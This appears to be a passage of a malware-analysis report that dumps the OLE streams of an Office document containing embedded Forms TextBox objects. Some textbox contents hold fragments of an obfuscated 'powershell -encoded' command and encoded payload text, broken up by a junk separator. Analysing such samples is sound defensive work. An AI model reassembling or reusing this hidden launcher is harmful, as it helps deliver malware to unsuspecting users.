                Data Raw:00 02 24 11 01 01 40 80 00 00 00 00 1b 48 80 2c 0c 11 00 80 1a 00 00 00 1a 00 00 00 4a 41 42 49 75 48 33 74 41 45 49 75 48 33 67 41 53 49 75 48 33 77 42 33 49 75 48 33 41 46 49 49 75 48 33 41 52 67 49 75 48 33 41 39 41 49 75 48 33 43 63 41 49 75 48 33 53 67 42 49 75 48 33 4a 41 47 49 75 48 33 49 41 62 49 75 48 33 67 42 32 49 75 48 33 41 47 59 49 75 48 33 41 62 77 49 75 48 33 42 4d
                Stream Path: ObjectPool/_1630480609/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480609/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480609/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480609/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Data ASCII:w . 6 . k . w . i . q . . . . . . . . .
                Data Raw:77 00 36 00 6b 00 77 00 69 00 71 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480609/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480609/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480609/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480609/contents
                File Type:data
                Stream Size:64
                Entropy:3.55239648336
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . w r u p V o i o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 77 72 75 70 56 6f 69 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480610/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480610/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480610/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480610/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.55677964945
                Base64 Encoded:False
                Data ASCII:h . j . j . z . V . w . . . . . . . . .
                Data Raw:68 00 6a 00 6a 00 7a 00 56 00 77 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480610/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480610/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480610/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480610/contents
                File Type:data
                Stream Size:64
                Entropy:3.5759867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . A 1 U H A m Z o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 41 31 55 48 41 6d 5a 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480611/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480611/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480611/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480611/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:c . Z . D . u . V . z . . . . . . . . .
                Data Raw:63 00 5a 00 44 00 75 00 56 00 7a 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480611/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480611/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480611/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480611/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . K n 0 G i z u o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 4b 6e 30 47 69 7a 75 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480612/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480612/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480612/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480612/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:J . S . E . p . 1 . H . h . . . . . . .
                Data Raw:4a 00 53 00 45 00 70 00 31 00 48 00 68 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480612/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480612/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480612/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480612/contents
                File Type:data
                Stream Size:64
                Entropy:3.6384867178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . h W h L U R B o . . . . 5 . . . . . . . . . . . . . . . C a l i b r i o
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 68 57 68 4c 55 52 42 6f 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 6f
                Stream Path: ObjectPool/_1630480613/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480613/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480613/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480613/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:u . X . S . v . z . Y . . . . . . . . .
                Data Raw:75 00 58 00 53 00 76 00 7a 00 59 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480613/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480613/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480613/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480613/contents
                File Type:data
                Stream Size:64
                Entropy:3.62669160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . V U d D k j i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 56 55 64 44 6b 6a 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480614/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480614/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480614/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480614/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:G . o . W . s . R . h . k . . . . . . .
                Data Raw:47 00 6f 00 57 00 73 00 52 00 68 00 6b 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480614/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480614/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480614/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480614/contents
                File Type:data
                Stream Size:64
                Entropy:3.56419160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . U 5 B T r F i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 55 35 42 54 72 46 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480615/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480615/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480615/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480615/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.8166422781
                Base64 Encoded:False
                Data ASCII:z . J . W . s . p . w . z . . . . . . .
                Data Raw:7a 00 4a 00 57 00 73 00 70 00 77 00 7a 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480615/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480615/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480615/contents, File Type: data, Stream Size: 92
                General
                Stream Path:ObjectPool/_1630480615/contents
                File Type:data
                Stream Size:92
                Entropy:4.21099943606
                Base64 Encoded:False
                Data ASCII:. . < . . . @ . . . . . . H . , " . . . . . . . . . . . p o w e I u H 3 r s h e I u H 3 l l - I u H 3 e n c o I u H 3 d . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 3c 00 01 01 40 80 00 00 00 00 1b 48 80 2c 22 00 00 80 1a 00 00 00 1a 00 00 00 70 6f 77 65 49 75 48 33 72 73 68 65 49 75 48 33 6c 6c 20 2d 49 75 48 33 65 6e 63 6f 49 75 48 33 64 20 00 00 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480616/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480616/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480616/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480616/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.8166422781
                Base64 Encoded:False
                Data ASCII:k . E . 4 . i . Q . Q . r . . . . . . .
                Data Raw:6b 00 45 00 34 00 69 00 51 00 51 00 72 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480616/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480616/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480616/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480616/contents
                File Type:data
                Stream Size:64
                Entropy:3.59544160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . q U l w A m i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 71 55 6c 77 41 6d 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480617/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480617/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480617/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480617/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:T . R . F . 9 . W . z . . . . . . . . .
                Data Raw:54 00 52 00 46 00 39 00 57 00 7a 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480617/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480617/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480617/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480617/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . W f H 3 t O j h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 07 00 00 80 1a 00 00 00 1a 00 00 00 57 66 48 33 74 4f 6a 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480618/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480618/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480618/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480618/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:q . i . j . k . Y . G . . . . . . . . .
                Data Raw:71 00 69 00 6a 00 6b 00 59 00 47 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480618/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480618/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480618/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480618/contents
                File Type:data
                Stream Size:64
                Entropy:3.62669160058
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . V v P j m 4 i h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 06 00 00 80 1a 00 00 00 1a 00 00 00 56 76 50 6a 6d 34 69 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480619/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480619/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480619/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480619/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.9166422781
                Base64 Encoded:False
                Data ASCII:b . t . n . 5 . h . V . S . . . . . . .
                Data Raw:62 00 74 00 6e 00 35 00 68 00 56 00 53 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480619/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480619/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480619/contents, File Type: data, Stream Size: 64
                General
                Stream Path:ObjectPool/_1630480619/contents
                File Type:data
                Stream Size:64
                Entropy:3.6072367178
                Base64 Encoded:False
                Data ASCII:. . . . . @ . . . . . . H . , . . . . . . . . . . . . q v k E Y l v h . . . . 5 . . . . . . . . . . . . . . . C a l i b r i h
                Data Raw:00 02 20 00 01 01 40 80 00 00 00 00 1b 48 80 2c 08 00 00 80 1a 00 00 00 1a 00 00 00 71 76 6b 45 59 6c 76 68 00 02 18 00 35 00 00 00 07 00 00 80 e1 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 68
                Stream Path: ObjectPool/_1630480620/\x1CompObj, File Type: data, Stream Size: 116
                General
                Stream Path:ObjectPool/_1630480620/\x1CompObj
                File Type:data
                Stream Size:116
                Entropy:4.74681963886
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . B . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 T e x t B o x . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . T e x t B o x . 1 . . 9 . q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 10 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 1c 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 54 65 78 74 42 6f 78 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 10 00 00 00 46 6f 72 6d 73 2e 54 65 78 74 42 6f 78 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480620/\x3OCXNAME, File Type: data, Stream Size: 20
                General
                Stream Path:ObjectPool/_1630480620/\x3OCXNAME
                File Type:data
                Stream Size:20
                Entropy:1.65677964945
                Base64 Encoded:False
                Data ASCII:G . U . l . 0 . L . E . . . . . . . . .
                Data Raw:47 00 55 00 6c 00 30 00 4c 00 45 00 00 00 00 00 00 00 00 00
                Stream Path: ObjectPool/_1630480620/\x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:ObjectPool/_1630480620/\x3ObjInfo
                File Type:data
                Stream Size:6
                Entropy:1.79248125036
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 12 03 00 04 00
                Stream Path: ObjectPool/_1630480620/\x3PRINT, File Type: data, Stream Size: 452
                General
                Stream Path:ObjectPool/_1630480620/\x3PRINT
                File Type:data
                Stream Size:452
                Entropy:3.30350617225
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . i i i . . . . . . . - . . .
                Data Raw:08 00 1a 00 1a 00 00 00 01 00 09 00 00 03 de 00 00 00 05 00 1c 00 00 00 00 00 04 00 00 00 03 01 08 00 05 00 00 00 0b 02 00 00 00 00 05 00 00 00 0c 02 01 00 01 00 03 00 00 00 1e 00 07 00 00 00 fc 02 00 00 ff ff ff 00 00 00 04 00 00 00 2d 01 00 00 09 00 00 00 1d 06 21 00 f0 00 01 00 01 00 00 00 00 00 09 00 00 00 1d 06 21 00 f0 00 01 00 00 00 00 00 00 00 07 00 00 00 fc 02 00 00 a0 a0
                Stream Path: ObjectPool/_1630480620/contents, File Type: data, Stream Size: 64
